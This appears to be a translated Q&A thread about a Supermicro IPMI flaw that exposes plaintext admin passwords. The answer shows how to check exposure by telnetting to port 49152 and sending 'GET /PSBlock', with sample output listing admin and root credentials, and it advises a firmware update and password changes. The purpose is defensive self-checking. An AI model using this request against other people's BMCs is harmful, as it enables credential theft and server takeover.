Tengo algunos servidores Supermicro con IPMI ejecutándose, y como se describe en este blog ( http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras ) hay una vulnerabilidad crítica a Obtenga contraseñas de administrador de texto sin formato desde cualquier ubicación remota.
¿Cómo verificar si la placa base de mi servidor está comprometida?
Respuestas:
Simplemente haga telnet a la dirección IP de IPMI en el puerto 49152 y realice una solicitud GET específica. Debe obtener sus usuarios y contraseñas si se ve comprometido.
telnet server.example.com 49152
Después de la conexión, solicite GET /PSBlocky vea los resultados, debería ser algo como esto:
Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock
Responder:
=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??
Para resolver este problema, actualice el firmware de IPMI a la última versión. El firmware es específico para su controlador IPMI, por lo que debe obtener el especificado en el sitio web de Supermicro.
Luego, después de actualizar el firmware, cambie sus contraseñas .